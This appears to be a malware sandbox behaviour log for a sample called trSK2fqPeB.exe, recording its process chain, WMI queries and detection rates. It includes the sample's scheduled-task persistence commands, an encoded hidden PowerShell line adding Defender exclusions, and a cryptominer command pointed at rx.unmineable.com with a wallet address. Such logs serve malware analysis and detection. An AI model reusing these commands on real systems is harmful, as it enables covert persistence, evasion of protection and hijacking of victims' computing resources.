Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\trSK2fqPeB.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: trSK2fqPeB.exe	ReversingLabs: Detection: 18%
Source: trSK2fqPeB.exe	Virustotal: Detection: 31%

Source: AddInProcess.exe	String found in binary or memory: id-cmc-addExtensions
Source: AddInProcess.exe	String found in binary or memory: set-addPolicy

Source: C:\Users\user\Desktop\trSK2fqPeB.exe

File read: C:\Users\user\Desktop\trSK2fqPeB.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\trSK2fqPeB.exe "C:\Users\user\Desktop\trSK2fqPeB.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe "C:\Users\user\AppData\Local\Temp\1000267001\52i.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe"
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Guid\TypeId.exe C:\Users\user\AppData\Roaming\Guid\TypeId.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Pictures\Illumination.pif "C:\Users\user\Pictures\Illumination.pif"
Source: C:\Users\user\Pictures\Illumination.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe "C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe"
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Windows" /tr "C:\Users\user\Windows.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: unknown	Process created: C:\Users\user\Windows.exe C:\Users\user\Windows.exe
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe "C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k START "" "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe" & EXIT
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe "C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"
Source: unknown	Process created: C:\Users\user\Windows.exe "C:\Users\user\Windows.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe "C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe "C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe"
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\Pictures\Illumination.pif "C:\Users\user\Pictures\Illumination.pif"
Source: C:\Users\user\Pictures\Illumination.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
Source: C:\Users\user\Desktop\trSK2fqPeB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe "C:\Users\user\AppData\Local\Temp\1000267001\52i.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe "C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe "C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe "C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
Source: C:\Users\user\Pictures\Illumination.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Windows" /tr "C:\Users\user\Windows.exe"
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe "C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe "C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe "C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u RVN:RR7XQNc8dKLtgQouBpDVpnVyh2AvUBCjXJ.RIG -p x --cpu-max-threads-hint=50
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\Pictures\Illumination.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
